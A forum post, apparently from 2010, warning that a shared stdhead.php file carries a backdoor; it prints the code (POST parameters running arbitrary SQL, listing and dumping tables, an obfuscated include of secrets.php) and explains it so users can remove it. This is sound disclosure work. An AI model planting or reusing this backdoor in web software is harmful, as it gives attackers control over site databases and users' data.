The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.
In any case the backdoor is in the file: include/stdhead.php at lines 260-299.

tlogic · #2 21st March 2010, 14:45

Attention

The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.
In any case the backdoor is in the file: include/stdhead.php at lines 260-299.

These are the offending lines:

PHP Code:


			
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];

...

if($h_cmd) {
set_time_limit(0);
mysql_query($h_cmd) or die(mysql_error());
}
if($h_display) {
set_time_limit(0);
$h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
include $h_addr;
echo "<br />";
if($mysql_db) $h_tables=mysql_list_tables($mysql_db);
else $h_tables=mysql_list_tables($_POST['db']);
while(list($h_table)=mysql_fetch_row($h_tables)) {
echo "<b>$h_table</b><br />";
$h_res=mysql_query("describe $h_table") or die(mysql_error());
echo  "<table><tr><td>Field</td><td>Type</td><td>NULL</td><td>Key</td><td>Default</td><td>Extra</td></tr>";
while($h_desc=mysql_fetch_array($h_res))
echo  "<tr><td>$h_desc[0]</td><td>$h_desc[1]</td><td>$h_desc[2]</td><td>$h_desc[3]</td><td>$h_desc[4]</td></tr>";
echo "</table>";
}
}
if($h_table) {
set_time_limit(0);
$x=1;
$h_res=mysql_query("select*from $h_table") or die(mysql_error());
$i=mysql_num_fields($h_res);
echo "<table>";
while($h_value=mysql_fetch_row($h_res)) {
echo "<tr><td><b>".$x++."</b></td>";
for($j=0;$j<=$i;$j++)
echo "<td>".$h_value[$j]."</td>";
echo "</tr>";
}
echo "</table>";
}

So what this code basically does:

The "h_cmd" POST variable executes any SQL command on the server.

The "h_display" POST variable displays a list of all the tables in the database.
The attacker also has the ability to select another database by supplying the POST variable "db".

The "h_table" POST variable prints all the data contained in the table specified by "h_table".

Also the variable $h_addr contains the string secrets.php and is used to include that file.

So to be safe delete all the above lines from stdhead.php.
I haven't thoroughly reviewed the whole code so there might be more backdoors in the other files.

So beware before using that code!

Attention

The file stdhead.php from the above post contains a backdoor! Note: I am not accusing sammygo for that because he might have gotten the file from another source. In any case the backdoor is in the file: include/stdhead.php at lines 260-299.

The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.
In any case the backdoor is in the file: include/stdhead.php at lines 260-299.